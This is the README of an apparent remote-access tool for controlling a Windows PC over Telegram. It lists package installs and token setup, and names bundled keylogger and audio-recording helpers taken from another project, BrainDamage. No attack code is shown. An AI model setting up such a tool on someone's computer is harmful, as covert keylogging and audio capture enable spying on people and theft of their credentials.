Control Windows PC via Telegram
- Clone this repository.
- Install Python 3.x (Last tested on 3.7).
pip3 install telepot pillow urllib3==1.24.1 requests
- Download pywin32, pyhook and pyaudio and install one by one
pip3 install path/to/.whl/file
- Replace CHAT_ID and ACCESS_TOKEN in
main.py
file. - Run main.py.
DirectoryTree.py, RadiumKeylogger.py and RecAudio.py located in helper directory is from BrainDamage.